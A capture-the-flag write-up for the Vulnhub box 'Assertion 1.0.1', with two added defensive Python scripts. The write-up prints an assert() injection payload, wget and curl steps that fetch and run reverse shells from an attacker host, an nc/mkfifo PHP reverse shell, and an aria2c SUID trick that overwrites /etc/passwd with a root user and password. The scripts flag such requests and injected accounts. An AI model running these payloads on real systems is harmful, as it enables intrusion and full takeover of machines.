Vulnhub: Assertion 1.0.1

H0j3n

This box taught me something new, and I want to share it with everyone who reads this :)

Enumeration

Let’s run nmap first and see what we get.

22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29

Port 80 (Http)

Port 80

The website has a lot of pages, so we can run Gobuster to check for any interesting files.

Gobuster Results

But we found nothing interesting there. So I checked the page source further and found that the link used to open any page looks like this. LFI!!!

http://<ip>/index.php?page=gallery

Local File Inclusion (LFI)

In this case, I always use Burp Suite together with my own custom wordlist (check the references).

Burpsuite: Intruder

Add the payload marker as shown in the diagram above and paste in the payload. Start the attack!

LFI Payloads

Okay, usually this works, but this time it did not work at all. So I searched for alternatives or other ways to get LFI, and by using the keywords “assert” and “lfi” I found an interesting StackOverflow discussion.

StackOverFlow Discussions

It works nicely! Use CyberChef to URL-encode the payload.

' and die(show_source('/etc/passwd')) or '

Burpsuite: Repeater
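The payload above only works because the page parameter ends up inside a quoted string that is handed to PHP's assert(), so a stray single quote lets the attacker close the string and append their own expression. From the defender's side, the same property makes these requests easy to recognise once the query string is URL-decoded. The following Python script is an added example, not part of the original writeup: it scans constructed Apache-style access log lines (all IPs, timestamps and user agents are made up) and flags ?page= values that contain PHP function calls, a quote-breakout (`' and` / `' or`), or directory traversal.

```python
"""Flag assert()-style injection attempts in the ?page= parameter.

Added example, not from the original writeup. The sample log lines below are
constructed to mirror the payloads used against this box; they are not real
traffic from the machine.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2020:10:00:01 +0000] "GET /index.php?page=gallery HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2020:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2020:10:00:03 +0000] "GET /index.php?page=%27%20and%20die(show_source(%27/etc/passwd%27))%20or%20%27 HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2020:10:00:04 +0000] "GET /index.php?page=%27%20and%20die(system(%22curl%20http://10.0.0.5/shell.php%7Cphp%22))%20or%20%27 HTTP/1.1" 200 30 "-" "curl/7.68.0"
10.0.0.9 - - [10/Oct/2020:10:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 980 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request URI and status code of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators that a value was meant to break out of a quoted PHP string inside
# assert() and execute code, rather than to name a page.
CODE_PATTERNS = [
    ("php_call", re.compile(r"\b(die|system|exec|shell_exec|passthru|show_source|eval|assert)\s*\(", re.I)),
    ("quote_breakout", re.compile(r"'\s*(and|or)\s+", re.I)),
    ("path_traversal", re.compile(r"(\.\./|\.\.\\)")),
]


def classify_page_value(value):
    """Return the names of all indicators triggered by one decoded ?page= value."""
    return [name for name, pattern in CODE_PATTERNS if pattern.search(value)]


def scan_access_log(text):
    """Return (ip, decoded_page, indicators) for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand; skip rather than crash
        query = urlsplit(match.group("uri")).query
        for raw in parse_qs(query, keep_blank_values=True).get("page", []):
            # parse_qs already decodes one layer; a second unquote catches
            # double-encoded payloads that a WAF or the app might decode again.
            page = unquote(raw)
            indicators = classify_page_value(page)
            if indicators:
                hits.append((match.group("ip"), page, indicators))
    return hits


if __name__ == "__main__":
    for ip, page, indicators in scan_access_log(SAMPLE_LOG):
        print(f"{ip}  {','.join(indicators):30}  page={page!r}")
```

Only the requests carrying a breakout or traversal are reported; the ordinary `page=gallery` and `page=about` lines pass through. On the application side the fix is the usual one: never build a string for assert() or eval() from user input, and resolve the page parameter against a fixed allowlist of file names instead.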

First User (www-data)

I will show you two ways to get a reverse shell:

First (Msfvenom Payload)

#Create the payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
#Wget it into /tmp (URL-encoded)
' and die(system("wget 'http://<ip>/shell.elf' -O /tmp/shell.elf")) or '
#Run it while multi/handler is listening
' and die(system("/tmp/shell.elf")) or '

Second (Curl Php)

#Create a PHP reverse shell (shell.php)
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.142 9001 >/tmp/f');
?>
#Curl it into php and listen (URL-encoded)
' and die(system("curl http://<ip>/shell.php|php")) or '

We got our shell!

Reverse Shell

Root

Let's run linpeas and check whether it finds any interesting files.

Linpeas Result

The aria2c binary is highlighted in yellow!! So after checking GTFOBins I found something related to the SUID bit, but it does not seem to work at all :’)

GTFOBins SUID aria2c

But I can read /etc/shadow as root using this command:

/usr/bin/aria2c -i <any file>

After a lot of searching, I found a way to overwrite a file as root. These are my steps, and I hope everyone learns something new from my writing :) You can view my previous writeup on how to escalate when /etc/passwd is writable.

#Copy /etc/passwd by reading it as root
/usr/bin/aria2c -i /etc/passwd
#Add a user with root rights to the file
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
#Fetch it into /etc (must be run from inside the /etc directory)
/usr/bin/aria2c -o passwd "http://<ip>/newpasswd" --allow-overwrite=true
#Get the shell! (Pass : Password@973)
su Tom
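The line added to /etc/passwd above leaves two fingerprints that are easy to check for: a second UID 0 account that is not root, and a DES crypt hash sitting in the password field instead of the `x` that points to /etc/shadow. The following Python script is an added example, not part of the original writeup: it parses passwd-format text and reports those conditions, plus malformed lines and empty password fields. The sample passwd content is constructed, with the `Tom` line copied from the step above so the audit has something to find.

```python
"""Audit /etc/passwd content for the signs of an injected root-equivalent user.

Added example, not part of the original writeup. SAMPLE_PASSWD is constructed;
only the "Tom" line mirrors the entry added in the privilege escalation step.
"""

# Constructed sample: a normal-looking file with one injected entry.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""

# Password-field values that mean "no usable password here": shadowed or locked.
SHADOWED_OR_LOCKED = ("x", "*", "!", "!!")
NO_LOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")


def parse_passwd(text):
    """Split passwd-format text into (entries, malformed).

    entries is a list of dicts for well-formed 7-field lines; malformed is a
    list of (line_number, raw_line) for anything that does not parse.
    """
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            malformed.append((lineno, line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        try:
            entries.append({
                "name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                "gecos": gecos, "home": home, "shell": shell, "lineno": lineno,
            })
        except ValueError:  # non-numeric uid/gid
            malformed.append((lineno, line))
    return entries, malformed


def audit_passwd(text):
    """Return a list of (severity, account_or_line, reason) findings."""
    entries, malformed = parse_passwd(text)
    findings = [("high", line, f"malformed passwd line {lineno}") for lineno, line in malformed]
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("critical", e["name"], "UID 0 account other than root"))
        if e["pw"] == "":
            if e["shell"] not in NO_LOGIN_SHELLS:
                findings.append(("high", e["name"], "empty password field with a login shell"))
        elif e["pw"] not in SHADOWED_OR_LOCKED:
            # Any other value is a hash stored directly in passwd, bypassing
            # the root-only /etc/shadow and exposing it to every local user.
            findings.append(("critical", e["name"], "password hash stored in /etc/passwd instead of /etc/shadow"))
    return findings


if __name__ == "__main__":
    for severity, who, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"[{severity}] {who}: {reason}")
```

Run against the sample, the audit reports only the injected `Tom` entry, twice: once for the duplicate UID 0 and once for the in-line hash. The same checks apply to a file integrity monitor's diff of /etc/passwd, which is where the overwrite via `aria2c --allow-overwrite` would first show up; the root cause on this box is the SUID bit on aria2c, and removing it is the fix.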

Rooted! The previous box really helped me a lot this time haha. I would like to thank my friend @ch4rm; if it were not for him I would not have thought of this xD

Root Shell